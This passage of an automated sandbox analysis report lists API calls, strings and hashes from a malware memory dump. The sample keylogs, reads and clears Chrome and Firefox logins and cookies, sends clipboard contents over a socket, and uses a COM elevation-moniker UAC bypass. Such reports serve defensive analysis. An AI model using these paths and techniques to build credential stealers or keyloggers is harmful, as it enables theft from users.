                              • FindClose.KERNEL32(00000000), ref: 0040B517
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$CloseFile$FirstNext
                              • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                              • API String ID: 1164774033-3681987949
                              • Opcode ID: 8a573f4cde42bb8974b55a1bb9849f05b01946ec243df485f40a07b19650f4e4
                              • Instruction ID: 89bba1744b34cafda07904381260291e44814ca984bf7dbd554ee600cd7873bd
                              • Opcode Fuzzy Hash: 8a573f4cde42bb8974b55a1bb9849f05b01946ec243df485f40a07b19650f4e4
                              • Instruction Fuzzy Hash: 4D512C319042195ADB14FBA1EC96AEE7768EF50318F50007FF805B31E2EF389A45CA9D
                              APIs
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B5B2
                              • FindClose.KERNEL32(00000000), ref: 0040B5CC
                              • FindNextFileA.KERNEL32(00000000,?), ref: 0040B68C
                              • FindClose.KERNEL32(00000000), ref: 0040B6B2
                              • FindClose.KERNEL32(00000000), ref: 0040B6D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$Close$File$FirstNext
                              • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                              • API String ID: 3527384056-432212279
                              • Opcode ID: e3298efea2014f122d9e4da4ca7a52805c3aaa742dc7125d16785d6f153ddc68
                              • Instruction ID: 41d59f58487c11b5b23c2ebc8e3123b77d6604a8f5f59a85184e8f88ff1ca84c
                              • Opcode Fuzzy Hash: e3298efea2014f122d9e4da4ca7a52805c3aaa742dc7125d16785d6f153ddc68
                              • Instruction Fuzzy Hash: 65413A319042196ACB14F7A1EC569EE7768EE21318F50017FF801B31E2EF399A458A9E
                              APIs
                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,?,00474358), ref: 0040E233
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00474358), ref: 0040E25E
                              • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E27A
                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E2FD
                              • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E30C
                                • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                • Part of subcall function 004127D5: RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                • Part of subcall function 004127D5: RegCloseKey.KERNELBASE(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                              • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E371
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Close$CreateHandleProcess32$FileFirstModuleNameNextSnapshotToolhelp32Value
                              • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$BG
                              • API String ID: 726551946-3025026198
                              • Opcode ID: 5829e150cee290297d3b2fa5b4d652fb26d49642f3ffce9c75a7d7dcd293438e
                              • Instruction ID: ae31f71cb8b9f969ca9e83e5ca698076ed3bac053ed440982de07d1dc4d90588
                              • Opcode Fuzzy Hash: 5829e150cee290297d3b2fa5b4d652fb26d49642f3ffce9c75a7d7dcd293438e
                              • Instruction Fuzzy Hash: ED7172311083019BC714FB61D8519EF77A5BF91358F400D3EF986631E2EF38A959CA9A
                              APIs
                              • OpenClipboard.USER32 ref: 004159C7
                              • EmptyClipboard.USER32 ref: 004159D5
                              • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004159F5
                              • GlobalLock.KERNEL32(00000000), ref: 004159FE
                              • GlobalUnlock.KERNEL32(00000000), ref: 00415A34
                              • SetClipboardData.USER32(0000000D,00000000), ref: 00415A3D
                              • CloseClipboard.USER32 ref: 00415A5A
                              • OpenClipboard.USER32 ref: 00415A61
                              • GetClipboardData.USER32(0000000D), ref: 00415A71
                              • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                              • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                              • CloseClipboard.USER32 ref: 00415A89
                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                              • String ID:
                              • API String ID: 3520204547-0
                              • Opcode ID: b6563c01279e5a2def22d7282fda85c49e98bc11e37defa9611b1278314c6eef
                              • Instruction ID: b8e523df9fc7c7245f85f50a48877f09888e29e8b5459684195c928b546a98bf
                              • Opcode Fuzzy Hash: b6563c01279e5a2def22d7282fda85c49e98bc11e37defa9611b1278314c6eef
                              • Instruction Fuzzy Hash: E02183712043009BC714BBB1EC5AAAE76A9AF80752F00453EFD06961E2EF38C845D66A
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 0$1$2$3$4$5$6$7
                              • API String ID: 0-3177665633
                              • Opcode ID: b1fb05e11c356ba634f14b88ac069ae329bf2eb132947a5908c699400be529fa
                              • Instruction ID: 2879f211a781d1662389055333b9a248a4bc7621c6500268a6892da51c348380
                              • Opcode Fuzzy Hash: b1fb05e11c356ba634f14b88ac069ae329bf2eb132947a5908c699400be529fa
                              • Instruction Fuzzy Hash: CC61A370508301AEDB00EF21D862FEA77E4AF85754F40485EFA91672E1DF789A48C797
                              APIs
                              • GetForegroundWindow.USER32 ref: 00409B3F
                              • GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                              • GetKeyboardLayout.USER32(00000000), ref: 00409B52
                              • GetKeyState.USER32(00000010), ref: 00409B5C
                              • GetKeyboardState.USER32(?), ref: 00409B67
                              • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                              • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                              • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409C1C
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                              • String ID: 8[G
                              • API String ID: 1888522110-1691237782
                              • Opcode ID: 62c4c2556f5e099e9a9792d70b860f0f67bc178eac4334f9f50af38fee2ec64e
                              • Instruction ID: f24a8317de74a0bbad47f265c67a45df51816e9018bfad09e00086f3728f1c27
                              • Opcode Fuzzy Hash: 62c4c2556f5e099e9a9792d70b860f0f67bc178eac4334f9f50af38fee2ec64e
                              • Instruction Fuzzy Hash: EE318172508309AFD700DF90DC85FDBB7ECEB48715F00083ABA45961A1D6B5E948DB96
                              APIs
                              • _wcslen.LIBCMT ref: 00406788
                              • CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Object_wcslen
                              • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                              • API String ID: 240030777-3166923314
                              • Opcode ID: f680b05b7da9254b8b2e62aef58334289a0f3b659c75efd963e3361adaa2c028
                              • Instruction ID: dba8c49f7cecafb8ed31af17d29d910bb03d3c12ecd117c8e18c4d6c9c114880
                              • Opcode Fuzzy Hash: f680b05b7da9254b8b2e62aef58334289a0f3b659c75efd963e3361adaa2c028
                              • Instruction Fuzzy Hash: 811170B2901118AEDB10FAA5884AA9EB7BCDB48714F55007FE905F3281E7789A148A7D
                              APIs
                              • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004748F8), ref: 004198D8
                              • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00419927
                              • GetLastError.KERNEL32 ref: 00419935
                              • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041996D
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: EnumServicesStatus$ErrorLastManagerOpen
                              • String ID:
                              • API String ID: 3587775597-0
                              • Opcode ID: 5f0a1bae1b201243f86f7b2652fdc4feea69b887222197adb83933992660ffc8
                              • Instruction ID: 5304d2aa3016a1bb8b693e548c532b43deb082133906afc562c92feca393f19d
                              • Opcode Fuzzy Hash: 5f0a1bae1b201243f86f7b2652fdc4feea69b887222197adb83933992660ffc8
                              • Instruction Fuzzy Hash: 37812F711083049BC614FB21DC959AFB7A8BF94718F50493EF582521E2EF78AA05CB9A
                              APIs
                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F2B
                              • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 004514C3
                              • IsValidCodePage.KERNEL32(00000000), ref: 0045151E
                              • IsValidLocale.KERNEL32(?,00000001), ref: 0045152D
                              • GetLocaleInfoW.KERNEL32(?,00001001,<D,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00451575
                              • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 00451594
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                              • String ID: <D$<D$<D
                              • API String ID: 745075371-3495170934
                              • Opcode ID: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                              • Instruction ID: fdda48fcf8ef828b158f806230e01f9d82b9b72a6df542884d0e4dc3e0683d2c
                              • Opcode Fuzzy Hash: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                              • Instruction Fuzzy Hash: 5A51D571900205ABEF10EFA5CC40BBF73B8AF05702F14056BFD11EB262E7789A488769
                              APIs
                              • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00409A01
                              • SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 00409A0F
                              • GetLastError.KERNEL32 ref: 00409A1B
                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00409A6B
                              • TranslateMessage.USER32(?), ref: 00409A7A
                              • DispatchMessageA.USER32(?), ref: 00409A85
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                              • String ID: Keylogger initialization failure: error $`#v
                              • API String ID: 3219506041-3226811161
                              • Opcode ID: f914becb081a9993f33aad084fbf751b59400094a878ef3f25fa208854e2a2a1
                              • Instruction ID: 76b292cdb4e6355f9a4176d1f10d626d2d11be3de55f9aee7ae49bf60faff0c2
                              • Opcode Fuzzy Hash: f914becb081a9993f33aad084fbf751b59400094a878ef3f25fa208854e2a2a1
                              • Instruction Fuzzy Hash: 201194716043015BC710AB7AAC4996B77ECAB94B15B10057FFC45D2291FB34DE01CBAB
                              APIs
                              • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B489
                              • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4BB
                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B529
                              • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B536
                                • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B50C
                              • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B561
                              • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B568
                              • GetLastError.KERNEL32(?,?,?,?,?,?,004742E0,004742F8), ref: 0041B570
                              • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B583
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                              • String ID:
                              • API String ID: 2341273852-0
                              • Opcode ID: e3c00313fe9feb441b7390d1c72d337a5a5a4ab260ce0f05f37d8840b2d05d0a
                              • Instruction ID: e81c2b0307560c21eb772b723951cbad4d8c7a866ea933437d0d5d39764c0eb1
                              • Opcode Fuzzy Hash: e3c00313fe9feb441b7390d1c72d337a5a5a4ab260ce0f05f37d8840b2d05d0a
                              • Instruction Fuzzy Hash: 0031627184921CAACB20D7B1AC89ADA77BCAF04309F4405EBF505D3181EB799AC5CE69
                              APIs
                              • FindFirstFileW.KERNEL32(00000000,?), ref: 00418EBF
                              • FindNextFileW.KERNEL32(00000000,?,?), ref: 00418F8B
                                • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$Find$CreateFirstNext
                              • String ID: @CG$XCG$`HG$`HG$>G
                              • API String ID: 341183262-3780268858
                              • Opcode ID: 314f7862f17973a04938054c00c2ef7007abd4565c09ecf4f516cc3f43255245
                              • Instruction ID: 861c71bda04042c44626cba1538e35c757a91b728f0af2478fb4c1063bb13cc5
                              • Opcode Fuzzy Hash: 314f7862f17973a04938054c00c2ef7007abd4565c09ecf4f516cc3f43255245
                              • Instruction Fuzzy Hash: B08141315042405BC314FB62C892EEFB3A5AFD1718F50493FF946671E2EF389A49C69A
                              APIs
                              • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 0041301A
                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00413026
                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                              • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004131ED
                              • GetProcAddress.KERNEL32(00000000), ref: 004131F4
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressCloseCreateLibraryLoadProcsend
                              • String ID: SHDeleteKeyW$Shlwapi.dll
                              • API String ID: 2127411465-314212984
                              • Opcode ID: d39c156f049645e1e34bb5f696c90ccd950e8ff77380a009300117a18b17bcce
                              • Instruction ID: cc67afc49b78d61a2372e1362dfc4f5d4a672f2d1b5b468e2109e7b1f18a6fb5
                              • Opcode Fuzzy Hash: d39c156f049645e1e34bb5f696c90ccd950e8ff77380a009300117a18b17bcce
                              • Instruction Fuzzy Hash: 4FB1B671A043006BC614BA76CC979BE76989F94718F40063FF946B31E2EF7C9A4486DB
                              APIs
                              • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040B257
                              • GetLastError.KERNEL32 ref: 0040B261
                              Strings
                              • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040B222
                              • [Chrome StoredLogins found, cleared!], xrefs: 0040B287
                              • UserProfile, xrefs: 0040B227
                              • [Chrome StoredLogins not found], xrefs: 0040B27B
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: DeleteErrorFileLast
                              • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                              • API String ID: 2018770650-1062637481
                              • Opcode ID: 4cd32df34f682fcf287b1bbdb8b1e04e90f5886a02fc20745afa94da3ae3815b
                              • Instruction ID: 236ee74dc97b4bdf00ef4875347123a6b81b21ae8e03a402b83ae8c28ff1bd46
                              • Opcode Fuzzy Hash: 4cd32df34f682fcf287b1bbdb8b1e04e90f5886a02fc20745afa94da3ae3815b
                              • Instruction Fuzzy Hash: 3001A23168410597CA0477B5ED6F8AE3624E921704F50017FF802731E2FF3A9A0586DE
                              APIs
                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                              • OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                              • GetLastError.KERNEL32 ref: 00416B02
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                              • String ID: SeShutdownPrivilege
                              • API String ID: 3534403312-3733053543
                              • Opcode ID: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                              • Instruction ID: c28276ca820f5d67da4083ad645d4fedab17ddc29f560671af9b7c8b6b4fa774
                              • Opcode Fuzzy Hash: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                              • Instruction Fuzzy Hash: 25F0D4B5805229BBDB10ABA1EC4DEEF7EBCEF05656F100061B805E2192D6748A44CAB5
                              APIs
                              Strings
                              Memory Dump Source
